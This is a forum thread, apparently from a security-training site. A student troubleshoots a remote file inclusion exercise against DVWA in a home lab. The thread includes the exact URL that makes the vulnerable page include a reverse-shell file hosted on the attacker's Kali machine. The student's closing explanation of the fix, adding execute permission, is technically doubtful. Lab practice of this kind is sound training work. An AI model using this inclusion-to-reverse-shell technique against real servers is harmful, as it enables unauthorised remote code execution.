Viewing 6 posts - 1 through 6 (of 6 total)
  • Author
    Posts
  • #35452
    Tom Harrow
    Participant

    When I execute the URL to establish the reverse connection, no connection is made by netcat. DVWA is set to “low. I receive these two messages right below the URL bar:
    “Warning: include(http:/10.0.2.6/reverse.txt) [function.include]: failed to open stream: No such file or directory in /var/www/dvwa/vulnerabilities/fi/index.php on line 35.
    Warning: include() [function.include]: Failed opening ‘http:/10.0.2.6/reverse.txt’ for inclusion (include_path=’.:/usr/share/php:/usr/share/pear:../../external/phpids/0.6/lib/’) in /var/www/dvwa/vulnerabilities/fi/index.php on line 35”.
    This is similar to errors I got with local file inclusion.

    Both Kali and Metasploitable are set to NatNetwork; Kali apache2 server is running. Phpini file edited to allow_url On. Thanks is advance.

    #35492
    Vashisht Boodhun
    Participant

    Can you paste the exact url used there?

    #35576
    Tom Harrow
    Participant

    Vashisht,

    This is the exact URL I used – http://10.0.2.7/dvwa/vulnerabilities/fi/?page=http:/10.0.2.6/reverse.txt

    kali machine is on 10.0.2.6, with apach2 server started. dvwa is on 10.0.2.7. reverse.txt file is in /var/www/html directory. Dvwa set to “low” security. Thanks in advance for your help. Have not had any luck finding the solution searching the web.

    #35601
    Vashisht Boodhun
    Participant

    Can you try clearing the browsing history for the kali machine?

    #35638
    Tom Harrow
    Participant

    That didn’t work, so I got to thinking about the php file. Since it had an extension of .txt, it probably couldn’t be executed without adding execution permissions. I did that and now it works. Thanks,

    Tom

    #35708
    Zaid SabihZaid Sabih
    Moderator

    Perfect, glad you figured it out 🙂

Viewing 6 posts - 1 through 6 (of 6 total)
  • You must be logged in to reply to this topic.
Privacy Overview
ZSecurity logo featuring a stylized red letter Z

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.

Strictly Necessary Cookies

Strictly Necessary Cookie should be enabled at all times so that we can save your preferences for cookie settings.

3rd Party Cookies

This website uses Google Analytics and Linkedin to collect anonymous information such as the number of visitors to the site, and the most popular pages.

Keeping these cookies enabled helps us to improve our website.